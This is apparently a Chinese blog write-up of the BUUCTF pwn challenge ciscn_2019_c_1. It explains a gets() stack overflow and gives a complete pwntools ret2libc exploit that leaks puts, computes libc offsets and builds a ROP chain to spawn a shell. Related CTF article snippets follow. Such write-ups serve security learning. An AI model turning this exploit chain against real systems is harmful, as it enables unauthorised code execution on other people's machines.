[BUUCTF]ciscn_2019_c_1 1

最新推荐文章于 2024-05-03 23:27:39 发布
最新推荐文章于 2024-05-03 23:27:39 发布
阅读量163 收藏
点赞数
文章标签: c语言 网络 开发语言 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55013445/article/details/133468572
版权

分析

使用

checksec ciscn_2019_c_1

可知,该程序开启了NX(栈不可执行)保护
checksec分析
再使用IDA进行反汇编对代码进行分析可知,漏洞点在encrypt()函数的gets()上
栈溢出漏洞
到此,思路明确,我们可以通过gets()的栈溢出漏洞,获取libc的基地址,接着通过libc的基地址获取system和str_bin_sh的地址,最后执行system(“/bin/sh”)

解题

整体解题思路同ret2libc
只不过这里需要注意一点,我们需要通过输入"\x00"来使strlen(s) = 0,阻止while()中的内容对我们的payload进行加密

from pwn import *

context(arch = 'amd64')

p = process('./ciscn_2019_c_1')
elf = ELF("./ciscn_2019_c_1")

p.sendline("1")
#enter into encrypt()
puts_plt = 0x4006e0
puts_got = elf.got['puts']
pop_rdi = 0x0000000000400c83
main_addr = elf.symbols['main']
#get libc_base addr
payload = b'\x00' + b'a' * (0x50 - 1 + 8) + p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main_addr)

p.sendlineafter("encrypted\n",payload)

p.recvuntil(b'Ciphertext\n')
p.recvuntil(b'\n')

puts_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
print("puts_addr = " + hex(puts_addr))
#make use of libc
libc_base = puts_addr - 0x84450
system_addr = libc_base + 0x522c0
bin_sh = libc_base + 0x1b45bd
ret_addr = 0x00000000004006b9

p.sendline("1")
#system("/bin/sh")
payload = b'\x00' +  b'a' * (0x50 - 1 + 8) + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)

p.sendlineafter("encrypted\n",payload)

p.interactive()
mick0960
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 243
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
ciscn_2019_c_1
qq_45913417的博客
11-18 8672
经典ret2libc,着实恶心到我了。前后捣鼓了将近3、4个小时,勉强把原理理解透彻。 边做题边C语言:艹! 输入字符串s加密逻辑: 1、如果是小写字母跟0xD异或 2、如果是大写字母跟0xE异或 3、如果是数字跟0xF异或 [ASCII码对照表]:(http://c.biancheng.net/c/ascii/) LibcSearcher工具:https://github.com/dev2ero/LibcSearcher from pwn import * from LibcSearcher i
ciscn_2019_c_1[BUUCTF]
最新发布
moonlightsunshin的博客
05-03 517
但是程序中没有直接可以用的system函数所以需要我们自己构造ROP链通过gets函数泄露出libc基址构造payload来泄露libc。在amd64架构下参数通过rdi传递0x400c83就是我们需要pop_rdi的地址。拿到题先三板斧hecksec --file=ciscn_2019_c_1看保护。开启了NX优先考虑ROP但是关闭了PIE则可能存在缓冲区溢出。查看堆栈窗口得到缓冲区大小 构造0x50+0x8即可溢出。得到 /bin/sh的地址。发现gets函数存在溢出。如果不行就换一个libc。
ciscn_2019_c_1(ret2libc)
m0_62322730的博客
04-19 198
ciscn_2019_c_1(ret2libc) 萌新跟着别人的文章复现滴~还有很多疑问,本文有任何问题请指正。
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6667
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Always-Y#Binary_study#IDA-Linux远程调试1
07-25
起因今天刷BUUCTF第三题 Reverse2,由于该程序石ELF格式,只能运行在Linux,动态调试需要GDB,对此我并不熟悉因此,跟大佬学习了,将软件放在L
BUUCTF】web之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 570
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 200
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1260
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
ciscn_2019_c_1 ret2lib
m0_48127441的博客
02-25 142
发现栈溢出非常简单 但是并没有system 等函数,只是没导入,但是模块(动态库)已经放入内存 在本地环境 使用vmmap 可以看到存在glibc-2.27.so 根据模块加载规则,同一个模块(动态库)在放入某进程的虚拟空间时, 起始位置会有一些偏差,但是函数对于基址的偏移是固定的 也就是说,只要获得一个模块的某一个函数,就能获得模块基址,同时获得模块所有函数地址 这里puts函数用的比较频繁,获得puts函数的地址即可 //即便是延迟绑定,在执行过后也能正常获得数据 即目标为 puts(.
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络...根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值